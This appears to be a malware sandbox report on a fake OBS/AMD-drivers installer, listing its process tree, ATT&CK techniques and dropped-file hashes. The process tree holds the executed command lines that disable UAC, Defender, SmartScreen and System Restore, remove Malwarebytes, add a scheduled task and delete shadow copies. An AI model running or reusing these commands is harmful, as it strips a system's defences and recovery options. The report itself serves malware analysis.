"C:\Users\Admin\AppData\Local\Temp\is-C5B3E.tmp\obs64.tmp" /SL5="$7018A,9334883,121344,C:\tmp\obs64.exe"
6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:544

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /f /im obs64.scr
7⤵
PID:872

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im obs64.scr
8⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1736

C:\tmp\obs64.exe
"C:\tmp\obs64.exe" /verysilent /sp-
7⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1064

C:\Users\Admin\AppData\Local\Temp\is-OCQO8.tmp\obs64.tmp
"C:\Users\Admin\AppData\Local\Temp\is-OCQO8.tmp\obs64.tmp" /SL5="$8018A,9334883,121344,C:\tmp\obs64.exe" /verysilent /sp-
8⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:1568

C:\tmp\obs64.scr
"C:\tmp\obs64.scr"
9⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:940

C:\tmp\obs64.sCr
"C:\tmp\obs64.sCr"
10⤵
- Executes dropped EXE
PID:1736

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C ""C:\Users\Admin\AppData\Local\Temp\inst.cmd""
9⤵
PID:1788

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C ""C:\Users\Admin\AppData\Local\Temp\de.cmd""
5⤵
- Deletes itself
PID:1772

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\tmp\.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1980

C:\Windows\System32\cmd.exe
cmd /c ""C:\TMP\.CMD" "
2⤵
- Drops file in Drivers directory
- Suspicious use of WriteProcessMemory
PID:1988

C:\Windows\system32\reg.exe
reg add "hklm\software\microsoft\windows\currentversion\policies\system" /v "consentpromptbehavioradmin" /t reg_dword /d "0" /f
3⤵
- UAC bypass
PID:2024

C:\Windows\system32\reg.exe
reg add "hklm\software\microsoft\windows\currentversion\policies\system" /v "consentpromptbehavioruser" /t reg_dword /d "0" /f
3⤵
- UAC bypass
PID:384

C:\Windows\system32\reg.exe
reg add "hklm\software\microsoft\windows\currentversion\policies\system" /v "promptonsecuredesktop" /t reg_dword /d "0" /f
3⤵
- UAC bypass
PID:1076

C:\Windows\system32\reg.exe
reg add "hklm\software\policies\microsoft\windows defender\spynet" /v "submitsamplesconsent" /t reg_dword /d "2" /f
3⤵
PID:1992

C:\Windows\system32\reg.exe
reg add "hklm\software\policies\microsoft\windows defender\spynet" /v "spynetreporting" /t reg_dword /d "0" /f
3⤵
PID:2032

C:\Windows\system32\reg.exe
reg add "hklm\software\policies\microsoft\windows defender" /v "puaprotection" /t reg_dword /d "0" /f
3⤵
PID:1656

C:\Windows\system32\reg.exe
reg add "hklm\software\policies\microsoft\windows defender\mpengine" /v "mpenablepus" /t reg_dword /d "0" /f
3⤵
PID:1552

C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\system32\smartscreen.exe" /a
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1572

C:\Windows\system32\icacls.exe
icacls "C:\Windows\system32\smartscreen.exe" /reset
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1432

C:\Windows\system32\taskkill.exe
taskkill /im smartscreen.exe /f
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1248

C:\Windows\system32\icacls.exe
icacls "C:\Windows\system32\smartscreen.exe" /inheritance:r /remove *s-1-5-32-544 *S-1-5-11 *s-1-5-32-545 *s-1-5-18
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:892

C:\Windows\system32\reg.exe
reg add "hklm\system\currentcontrolset\control\deviceguard\scenarios\hypervisorenforcedcodeintegrity" /v "enabled" /t reg_dword /d "1" /f
3⤵
PID:1488

C:\Windows\system32\reg.exe
reg add "hklm\software\policies\microsoft\windows\system" /v "enablesmartscreen" /t reg_dword /d "0" /f
3⤵
PID:1456

C:\Windows\system32\reg.exe
reg add "hklm\software\microsoft\windows\currentversion\explorer" /v "smartscreenenabled" /t reg_sz /d "off" /f
3⤵
PID:952

C:\Windows\system32\reg.exe
reg add "hklm\software\policies\microsoft\mrt" /v "dontofferthroughwuau" /t "reg_dword" /d "1" /f
3⤵
PID:1172

C:\Windows\system32\reg.exe
reg add "hklm\software\policies\microsoft\mrt" /v "dontreportinfectioninformation" /t "reg_dword" /d "1" /f
3⤵
PID:1580

C:\Windows\system32\reg.exe
reg add "hklm\software\policies\microsoft\windows defender\ux configuration" /v "notification_suppress" /t reg_dword /d "1" /f
3⤵
PID:1624

C:\Windows\system32\reg.exe
reg add "hklm\software\policies\microsoft\windows defender\windows defender exploit guard\controlled folder access" /v "enablecontrolledfolderaccess" /t reg_dword /d "0" /f
3⤵
PID:1628

C:\Windows\system32\reg.exe
reg add "hklm\software\policies\microsoft\windows defender\reporting" /v "disableenhancednotifications" /t reg_dword /d "1" /f
3⤵
PID:1736

C:\Windows\system32\reg.exe
reg add "hklm\software\microsoft\windows defender security center\notifications" /v "disableenhancednotifications" /t reg_dword /d "1" /f
3⤵
- Modifies Windows Defender notification settings
PID:1648

C:\Windows\system32\reg.exe
reg add "hklm\software\microsoft\windows defender security center\virus and threat protection" /v "filesblockednotificationdisabled" /t reg_dword /d "1" /f
3⤵
PID:1728

C:\Windows\system32\reg.exe
reg add "hklm\software\microsoft\windows defender security center\virus and threat protection" /v "noactionnotificationdisabled" /t reg_dword /d "1" /f
3⤵
PID:1748

C:\Windows\system32\reg.exe
reg add "hklm\software\microsoft\windows defender security center\virus and threat protection" /v "summarynotificationdisabled" /t reg_dword /d "1" /f
3⤵
PID:632

C:\Windows\system32\reg.exe
reg add "hklm\software\policies\microsoft\windows\explorer" /v "disablenotificationcenter" /t reg_dword /d "1" /f
3⤵
PID:1316

C:\Windows\system32\reg.exe
reg add "hkcu\software\microsoft\windows\currentversion\pushnotifications" /v "toastenabled" /t reg_dword /d "0" /f
3⤵
PID:860

C:\Windows\system32\reg.exe
reg add "hklm\software\policies\microsoft\windows defender security center\virus and threat protection" /v uilockdown /t reg_dword /d 1 /f
3⤵
PID:800

C:\Windows\system32\reg.exe
reg add "hklm\software\policies\microsoft\windows defender security center\app and browser protection" /v uilockdown /t reg_dword /d 1 /f
3⤵
PID:744

C:\Windows\system32\reg.exe
reg add "hklm\software\policies\microsoft\windows nt\systemrestore" /v "disableconfig" /t reg_dword /d "1" /f
3⤵
PID:1096

C:\Windows\system32\reg.exe
reg add "hklm\software\policies\microsoft\windows nt\systemrestore" /v "disablesr" /t reg_dword /d "1" /f
3⤵
PID:1724

C:\Windows\system32\reg.exe
reg add "hkcu\software\microsoft\windows\currentversion\policies\attachments" /v "savezoneinformation" /t reg_dword /d "1" /f
3⤵
PID:432

C:\Windows\system32\reg.exe
reg add "hklm\software\microsoft\windows\currentversion\policies\attachments" /v "savezoneinformation" /t reg_dword /d "1" /f
3⤵
PID:1344

C:\Windows\system32\reg.exe
reg add "hklm\software\microsoft\windows\currentversion\policies\attachments" /v "scanwithantivirus" /t reg_dword /d "1" /f
3⤵
PID:692

C:\Windows\system32\icacls.exe
icacls "C:\Users\Admin\AppData\Roaming\microsoft\windows\start menu\programs\startup" /remove:d "everyone" /t /c
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1612

C:\Windows\system32\icacls.exe
icacls "C:\Users\Admin\AppData\Roaming\microsoft\windows\start menu\programs\startup" /deny "everyone":(de,dc) /t /c
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2036

C:\Windows\system32\schtasks.exe
schtasks /create /xml "C:\Users\Admin\AppData\Roaming\obs-studio\bin\64bit\ar.xml" /tn ar /f
3⤵
- Creates scheduled task(s)
PID:2024

C:\Windows\system32\cmd.exe
cmd /c "C:\Program Files\malwarebytes\anti-malware\mbuns.exe" /uninstall /verysilent /f
3⤵
PID:1076

C:\Windows\system32\vssadmin.exe
vssadmin delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:1992

C:\Windows\system32\find.exe
find /c /i "checkappexec.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
3⤵
PID:2040

C:\Windows\system32\find.exe
find /c /i "smartscreen-prod.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
3⤵
PID:212

C:\Windows\system32\find.exe
find /c /i "nav.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
3⤵
PID:228

C:\Windows\system32\find.exe
find /c /i "nf.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
3⤵
PID:1332

C:\Windows\system32\find.exe
find /c /i "safebrowsing.googleapis.com" "C:\Windows\system32\drivers\etc\hosts"
3⤵
PID:1656

C:\Windows\system32\find.exe
find /c /i "ars.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
3⤵
PID:1420

C:\Windows\system32\find.exe
find /c /i "apprep.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
3⤵
PID:1992

C:\Windows\system32\find.exe
find /c /i "c.urs.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
3⤵
PID:1232

C:\Windows\system32\find.exe
find /c /i "feedback.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
3⤵
PID:328

C:\Windows\system32\find.exe
find /c /i "ping.nav.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
3⤵
PID:1464

C:\Windows\system32\find.exe
find /c /i "ping.nf.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
3⤵
PID:1180

C:\Windows\system32\find.exe
find /c /i "t.nav.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
3⤵
PID:868

C:\Windows\system32\find.exe
find /c /i "t.nf.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
3⤵
PID:1000

C:\Windows\system32\find.exe
find /c /i "t.urs.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
3⤵
PID:540

C:\Windows\system32\find.exe
find /c /i "unitedstates.smartscreen-prod.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
3⤵
PID:860

C:\Windows\system32\find.exe
find /c /i "urs.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
3⤵
PID:744

C:\Windows\system32\find.exe
find /c /i "urs.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
3⤵
PID:768

C:\Windows\system32\find.exe
find /c /i "slscr.update.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
3⤵
PID:1748

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1556

C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20221129171658.log C:\Windows\Logs\CBS\CbsPersist_20221129171658.cab
1⤵
- Drops file in Windows directory
PID:1468

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1966473036202615317052105467-137386563276895235447706374215480628571115768316"
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1624

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Bypass User Account Control

T1088

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

Bypass User Account Control

T1088

File Deletion

T1107

File Permissions Modification

T1222

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\TMP\.CMD
Filesize
28KB

MD5
43dbc0bf9164c0a548b45ddbb57ee50d

SHA1
dc4287a77c8eae83c141c99efefb70acf698a8a4

SHA256
b9d208b8aa071b76b1760bb69eee3151c75cd2779bcc94c9e77b67487dd5370c

SHA512
9ef08c4795098d582eeeb92ec6b1f353a1d43d145ea222ee94eb3f695341f48b0481db000835fcd4b3209d90989109ffb755cd83e0d40c804052c27be6a6893a

Download Submit
C:\Users\Admin\AppData\Local\Temp\de.cmd
Filesize
156B

MD5
9972539e20656e7d427e7032a91e612b

SHA1
2316a78991e127b9ddfba4b88376c24e220ac57e

SHA256
f64b2258031bbe5234e32a22ddf38ecefc6558c683cd60a2fa5bb20cd8e960e3

SHA512
121f36b14ad6dfb065bc5626233ce1edcdbef732e729c0a1db03147c78937cbf771434a762077e6ac2274a6ad87bb2490c153042e39d75c62a97019540ee23dd

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-8M6JS.tmp\temp\.cmd
Filesize
1KB

MD5
b46482b2d0cd42231e7430b7a7d48632

SHA1
2709f84185361c0c6d4840113dbf8a517a008380

SHA256
2418eeb7a1f96943d73758c01a7dd437f7a543681ca83b4493ffeb27b10d0d46

SHA512
99a7fb6e0934bc15b587ce4360ee4ac6297ca4e73878d557b28c6d98d04817ed5f9d2bdc35e4d3e828d442fe935973ccd1e719e7602055e4e360b9522af90eb5

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-8M6JS.tmp\temp\r.exe
Filesize
764KB

MD5
408dd6ade80f2ebbc2e5470a1fb506f1

SHA1
e00293ce0eb534874efd615ae590cf6aa3858ba4

SHA256
4c82fbafef9bab484a2fbe23e4ec8aac06e8e296d6c9e496f4a589f97fd4ab71

SHA512
4dbb2ef7374137edd0e7608822223188dda924967edd8d6650427eace2f90481a8f64b9c3f8bfdec5bc3dd31952d1491685562ce617f2c2c5afc5070cc9a62d0

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-8M6JS.tmp\temp\r.exe
Filesize
764KB

MD5
408dd6ade80f2ebbc2e5470a1fb506f1

SHA1
e00293ce0eb534874efd615ae590cf6aa3858ba4

SHA256
4c82fbafef9bab484a2fbe23e4ec8aac06e8e296d6c9e496f4a589f97fd4ab71

SHA512
4dbb2ef7374137edd0e7608822223188dda924967edd8d6650427eace2f90481a8f64b9c3f8bfdec5bc3dd31952d1491685562ce617f2c2c5afc5070cc9a62d0

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-8M6JS.tmp\temp\r.exe
Filesize
764KB

MD5
408dd6ade80f2ebbc2e5470a1fb506f1

SHA1
e00293ce0eb534874efd615ae590cf6aa3858ba4

SHA256
4c82fbafef9bab484a2fbe23e4ec8aac06e8e296d6c9e496f4a589f97fd4ab71

SHA512
4dbb2ef7374137edd0e7608822223188dda924967edd8d6650427eace2f90481a8f64b9c3f8bfdec5bc3dd31952d1491685562ce617f2c2c5afc5070cc9a62d0

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-8M6JS.tmp\temp\r.exe
Filesize
764KB

MD5
408dd6ade80f2ebbc2e5470a1fb506f1

SHA1
e00293ce0eb534874efd615ae590cf6aa3858ba4

SHA256
4c82fbafef9bab484a2fbe23e4ec8aac06e8e296d6c9e496f4a589f97fd4ab71

SHA512
4dbb2ef7374137edd0e7608822223188dda924967edd8d6650427eace2f90481a8f64b9c3f8bfdec5bc3dd31952d1491685562ce617f2c2c5afc5070cc9a62d0

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-8M6JS.tmp\temp\r.exe
Filesize
764KB

MD5
408dd6ade80f2ebbc2e5470a1fb506f1

SHA1
e00293ce0eb534874efd615ae590cf6aa3858ba4

SHA256
4c82fbafef9bab484a2fbe23e4ec8aac06e8e296d6c9e496f4a589f97fd4ab71

SHA512
4dbb2ef7374137edd0e7608822223188dda924967edd8d6650427eace2f90481a8f64b9c3f8bfdec5bc3dd31952d1491685562ce617f2c2c5afc5070cc9a62d0

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-8M6JS.tmp\temp\r.exe
Filesize
764KB

MD5
408dd6ade80f2ebbc2e5470a1fb506f1

SHA1
e00293ce0eb534874efd615ae590cf6aa3858ba4

SHA256
4c82fbafef9bab484a2fbe23e4ec8aac06e8e296d6c9e496f4a589f97fd4ab71

SHA512
4dbb2ef7374137edd0e7608822223188dda924967edd8d6650427eace2f90481a8f64b9c3f8bfdec5bc3dd31952d1491685562ce617f2c2c5afc5070cc9a62d0

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-8M6JS.tmp\temp\r.exe
Filesize
764KB

MD5
408dd6ade80f2ebbc2e5470a1fb506f1

SHA1
e00293ce0eb534874efd615ae590cf6aa3858ba4

SHA256
4c82fbafef9bab484a2fbe23e4ec8aac06e8e296d6c9e496f4a589f97fd4ab71

SHA512
4dbb2ef7374137edd0e7608822223188dda924967edd8d6650427eace2f90481a8f64b9c3f8bfdec5bc3dd31952d1491685562ce617f2c2c5afc5070cc9a62d0

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-8M6JS.tmp\temp\r.exe
Filesize
764KB

MD5
408dd6ade80f2ebbc2e5470a1fb506f1

SHA1
e00293ce0eb534874efd615ae590cf6aa3858ba4

SHA256
4c82fbafef9bab484a2fbe23e4ec8aac06e8e296d6c9e496f4a589f97fd4ab71

SHA512
4dbb2ef7374137edd0e7608822223188dda924967edd8d6650427eace2f90481a8f64b9c3f8bfdec5bc3dd31952d1491685562ce617f2c2c5afc5070cc9a62d0

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-8M6JS.tmp\temp\r.exe
Filesize
764KB

MD5
408dd6ade80f2ebbc2e5470a1fb506f1

SHA1
e00293ce0eb534874efd615ae590cf6aa3858ba4

SHA256
4c82fbafef9bab484a2fbe23e4ec8aac06e8e296d6c9e496f4a589f97fd4ab71

SHA512
4dbb2ef7374137edd0e7608822223188dda924967edd8d6650427eace2f90481a8f64b9c3f8bfdec5bc3dd31952d1491685562ce617f2c2c5afc5070cc9a62d0

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-8M6JS.tmp\temp\r.exe
Filesize
764KB

MD5
408dd6ade80f2ebbc2e5470a1fb506f1

SHA1
e00293ce0eb534874efd615ae590cf6aa3858ba4

SHA256
4c82fbafef9bab484a2fbe23e4ec8aac06e8e296d6c9e496f4a589f97fd4ab71

SHA512
4dbb2ef7374137edd0e7608822223188dda924967edd8d6650427eace2f90481a8f64b9c3f8bfdec5bc3dd31952d1491685562ce617f2c2c5afc5070cc9a62d0

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-8M6JS.tmp\temp\r.exe
Filesize
764KB

MD5
408dd6ade80f2ebbc2e5470a1fb506f1

SHA1
e00293ce0eb534874efd615ae590cf6aa3858ba4

SHA256
4c82fbafef9bab484a2fbe23e4ec8aac06e8e296d6c9e496f4a589f97fd4ab71

SHA512
4dbb2ef7374137edd0e7608822223188dda924967edd8d6650427eace2f90481a8f64b9c3f8bfdec5bc3dd31952d1491685562ce617f2c2c5afc5070cc9a62d0

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-8M6JS.tmp\temp\r.exe
Filesize
764KB

MD5
408dd6ade80f2ebbc2e5470a1fb506f1

SHA1
e00293ce0eb534874efd615ae590cf6aa3858ba4

SHA256
4c82fbafef9bab484a2fbe23e4ec8aac06e8e296d6c9e496f4a589f97fd4ab71

SHA512
4dbb2ef7374137edd0e7608822223188dda924967edd8d6650427eace2f90481a8f64b9c3f8bfdec5bc3dd31952d1491685562ce617f2c2c5afc5070cc9a62d0

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-8M6JS.tmp\temp\r.exe
Filesize
764KB

MD5
408dd6ade80f2ebbc2e5470a1fb506f1

SHA1
e00293ce0eb534874efd615ae590cf6aa3858ba4

SHA256
4c82fbafef9bab484a2fbe23e4ec8aac06e8e296d6c9e496f4a589f97fd4ab71

SHA512
4dbb2ef7374137edd0e7608822223188dda924967edd8d6650427eace2f90481a8f64b9c3f8bfdec5bc3dd31952d1491685562ce617f2c2c5afc5070cc9a62d0

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-8M6JS.tmp\temp\r.exe
Filesize
764KB

MD5
408dd6ade80f2ebbc2e5470a1fb506f1

SHA1
e00293ce0eb534874efd615ae590cf6aa3858ba4

SHA256
4c82fbafef9bab484a2fbe23e4ec8aac06e8e296d6c9e496f4a589f97fd4ab71

SHA512
4dbb2ef7374137edd0e7608822223188dda924967edd8d6650427eace2f90481a8f64b9c3f8bfdec5bc3dd31952d1491685562ce617f2c2c5afc5070cc9a62d0

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-8M6JS.tmp\temp\r.exe
Filesize
764KB

MD5
408dd6ade80f2ebbc2e5470a1fb506f1

SHA1
e00293ce0eb534874efd615ae590cf6aa3858ba4

SHA256
4c82fbafef9bab484a2fbe23e4ec8aac06e8e296d6c9e496f4a589f97fd4ab71

SHA512
4dbb2ef7374137edd0e7608822223188dda924967edd8d6650427eace2f90481a8f64b9c3f8bfdec5bc3dd31952d1491685562ce617f2c2c5afc5070cc9a62d0

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-8M6JS.tmp\temp\r.exe
Filesize
764KB

MD5
408dd6ade80f2ebbc2e5470a1fb506f1

SHA1
e00293ce0eb534874efd615ae590cf6aa3858ba4

SHA256
4c82fbafef9bab484a2fbe23e4ec8aac06e8e296d6c9e496f4a589f97fd4ab71

SHA512
4dbb2ef7374137edd0e7608822223188dda924967edd8d6650427eace2f90481a8f64b9c3f8bfdec5bc3dd31952d1491685562ce617f2c2c5afc5070cc9a62d0

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-C5B3E.tmp\obs64.tmp
Filesize
1.1MB

MD5
34acc2bdb45a9c436181426828c4cb49

SHA1
5adaa1ac822e6128b8d4b59a54d19901880452ae

SHA256
9c81817acd4982632d8c7f1df3898fca1477577738184265d735f49fc5480f07

SHA512
134ff4022571efd46f7a62e99b857ebe834e9916c786345908010f9e1fb90be226b740ddee16ae9290fe45c86be7238c4555e422abe66a461d11545e19734beb

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-JSB3S.tmp\AMD-drivers-2.0.7.tmp
Filesize
1.4MB

MD5
f91cacafae0f74891c7ed426567d83d3

SHA1
edc7b0b92fc96f7d984ae912dec615c3339ac5de

SHA256
3cad23c08c496dbde4895008cabc615599ce6db8aeedfac594e7d3310a022ff7

SHA512
a74a9c2175f121cba732ab48f7f88469f120cedeaca4c40314f43120ac401422ec78755306846053949b16421f7d4b8c51c3112c75a788200a28d51f35bdbf91

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-MF02J.tmp\AMD-drivers-2.0.7.tmp
Filesize
1.4MB

MD5
f91cacafae0f74891c7ed426567d83d3

SHA1
edc7b0b92fc96f7d984ae912dec615c3339ac5de

SHA256
3cad23c08c496dbde4895008cabc615599ce6db8aeedfac594e7d3310a022ff7

SHA512
a74a9c2175f121cba732ab48f7f88469f120cedeaca4c40314f43120ac401422ec78755306846053949b16421f7d4b8c51c3112c75a788200a28d51f35bdbf91

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OBS.lnk
Filesize
423B

MD5
2c58d59c01c2192208f17c18e14f4964

SHA1
ae2a2456c30db629f215cdf1a006f7fe7a0e332f

SHA256
006d95f9abd1b8f78ff29dc1965c0323c9f2a850f4b57f39e4edda40b890f0d4

SHA512
3ee2eda819c61b291c2f5c22520f9a9dbbbbfd3028fc0292a0c966202e054c000d6476f39c8f2a29628e5d882be7a6b31230cff4d8630a9579590afe4b05d299

Download Submit
C:\Users\Admin\AppData\Roaming\obs-studio\bin\64bit\ar.xml
Filesize
3KB

MD5
bf8d4925b769054a2c10ac106931a2fc

SHA1
5d5ea16c0f1a23d09a6a2abff0eebb4e98ebe92f

SHA256
5d4fc0de1f26e7961659f9866bfdd4c3043b9ecb099a691dc045d7e627a1febc

SHA512
fc21c3ce087ea5e609150e9c4645811873274312d20fc136a1909a58d70b790b1106ce964cf38a16cbb0fd67b32e603a1689568deed1c046b412c8ab2a305310

Download Submit
C:\Windows\system32\drivers\etc\hosts
Filesize
861B

MD5
ccaab279e1a808f65f24f8cf9f76ce9d

SHA1
4f03dffdb7468fcd96d701c2a1a1f62f056e3cc9

SHA256
4e6391c2a6b4eb748e3b83906b2cfe743f9645db6f2d44732a12247e62c2963e

SHA512
1af8d3ed35eb928bce408aa8ba2aad8eb4dc92717d7deb00ece007ced8381ebed82a27e6ec17bf9e747cce9f51f38e686e9edfd20c5920691f1f1bd15e89e5ca

Download Submit
C:\Windows\system32\drivers\etc\hosts
Filesize
902B

MD5
7b214d6d95ff114c808d1e64c43c7f2d

SHA1
ec8626bc0b1e557e6137691f4eaeb8fa9a99009d

SHA256
eebfe6d36feca8765826753f10403a16620618ffb779eca61d017192e64e26e2

SHA512
0d46da98af73cf44be51b0f4d41ad4d3463db0ea9d815bac660748ba116f12ac2b1937fbb0143f97b46b82c6577dd185e7aa5722e3b1acd08d15b04b5bf217fd

Download Submit
C:\Windows\system32\drivers\etc\hosts
Filesize
942B

MD5
55334a37089780f18eeaa70f3b274baf

SHA1
c14598167d692accf83ccd22004b176f59c557b6

SHA256
fea20c810ea7f8ddc49f2326d3b7479b2ca87bb9673428d21f08ce22ad37b58c

SHA512
9451de09b5b5b6f4a90bbdb499a68866e0633076df110cf103932dda00b9f29e771ebe06acb61c1ff283e7b4c7192d37ecc598adae7d98fd651a225eb9894289

Download Submit
C:\Windows\system32\drivers\etc\hosts
Filesize
981B

MD5
2920a7646681f086f0c966310c80d1d5

SHA1
9df9b6a4a7392eaa629cdf508352dbd61de218b3

SHA256
5875b7277289a610ccb534655f8883b80df2671cc09f8143fd558120e1038c55

SHA512
d7777a81ed48a5343c0177bb37e5f4ce9818dd063ef7f57514b7894d74f7e839660113937ada69b4e42700404a116161fbf7027710e1b6c1de1b78a4a3c7aa3c

Download Submit
C:\Windows\system32\drivers\etc\hosts
Filesize
1019B

MD5
ea0aba7b4b47f684b5a758f6569c3d77

SHA1
1e3230fb86e0c2bbda5fed9b0d6c7150517ec775

SHA256
5d1ae84aba859fce0ba763cd2481d898c550a76bcc091258636f50a117388fd3

SHA512
c2a1096ad7a34619e9dbea4a0959e2eefef1e96a752a580eb41fe8e79f978699018257be145de749fb546092b8347b1c133acbe5d6c7b1ca57f331c71e5d74c4

Download Submit
C:\Windows\system32\drivers\etc\hosts
Filesize
1KB

MD5
05997c72e4639716e7ddb5fd4278d861

SHA1
7b96b82400f547504f6ee32274868e9787d11420

SHA256
c0bff3a300c6a9f3e692d640f6318f05b45ae72b8f164b9a40344a91c6bce36a

SHA512
16697c60fd67964c66ead5823617516eba14400b09df3da9c7ee77c549d7e2c74b560d7a4607a537012733552cf52898bbcae1e334e7e65062958cca245a39b5

Download Submit
C:\Windows\system32\drivers\etc\hosts
Filesize
1KB

MD5
5ae4d1fcb2d9d07d5fe778fae7ef6ff0

SHA1
883d394492e1899951866fbb43da5392708e53a3

SHA256
113205caf212653ef0b70a7382d5f77bd68243d0f81be755d045d54e268f825e

SHA512
a0f1984d0eed0db2d82f992bd50817f9af3534e2a0a8aa72aff5bd8eb4addcc850bc6bf9cd20bc9a140bff05dbf3b79647a9fb76275b96e6f966300e6950d8b5

Download Submit
C:\Windows\system32\drivers\etc\hosts
Filesize
1KB

MD5
cd95ea96dabf6c7b2aa729c5f033ec53

SHA1
1cff2eeb87582dd88872960f84250e48143d472b

SHA256
043fc19c6cd1f211d21fae9461d8c0a47bab025f8266e5384b8fd9565fc953ac

SHA512
dd3d0a2e31eef7cd3c3ec00fe0aeaf248e51ed66543665959ecbf3ad7faeb55f77a408022fd748a5d7edff33f567c31cfbc867c8b292d003d10a43bec5c3b908

Download Submit
C:\Windows\system32\drivers\etc\hosts
Filesize
1KB

MD5
f9fb3575e73b4f707942d3efa582147a

SHA1
40f28d3cdc95ee46349cba64e9f0e9fd8fd8ba37

SHA256
cfd6e5acb71babb125d3f8f048f5d378c404c8a8ef1b120debbb0b1aaead6d5d

SHA512
56b8c6e7273cd752bc8b5841d45606cc2fbf919ac72312b1df7dbd57e6764e8bf979025ec8e1ca4ae5dda37f5090e4e6e26acacf1da90fea4b37a1c6a3a098bd

Download Submit
C:\Windows\system32\drivers\etc\hosts
Filesize
1KB

MD5
163d82b281219a265e6f035021c76670

SHA1
3defa289b4e14550ee9e2083d79fbb271fe4b97f

SHA256
62591c30bea18f749063b8f1a8ee325c3bc44550d0811313c17fce71b8754e9e

SHA512
fb6f01fa686a5fe70a8ad35b2bf0e7ffac93a06ef2176cdb186003f4576958c435a753d9609f001af7de9ce4d31096ffb54ff3f68ea700f0d1714142e965790e

Download Submit
C:\Windows\system32\drivers\etc\hosts
Filesize
1KB

MD5
0298c46468b2ec577565a92bcd2114a0

SHA1
c996b85993a2412213de6ea3bf9ee12ac89a6fba

SHA256
08525c2616d669c081322d463e65892d66083384ffd781e229af4c0de9450a40

SHA512
942f164527165840286c5b12fe3b314dfaade9c546abf260cedaff0cfa90a5784739991fdd7fae8d6c56138d45e2e2450161312dc4dd90ff3f3856e251f17f90

Download Submit
C:\Windows\system32\drivers\etc\hosts
Filesize
1KB

MD5
9f8eec90e96b330b1ff59776077fc3e2

SHA1
842f418d71df86676b69a4ebdbb2c94473dea5db

SHA256
c50dd21ba1400408267a24c9ce11d55da7817cbd1bc37c2059e65e91a097ac46

SHA512
273d5863df64cf2edd299c7832edf50ec39c8860068405349301f8df36e922c6690cca7fd1bfe40b7a920d01db56b5fb980a17e4e34c21802b254d3fc0353c0c

Download Submit
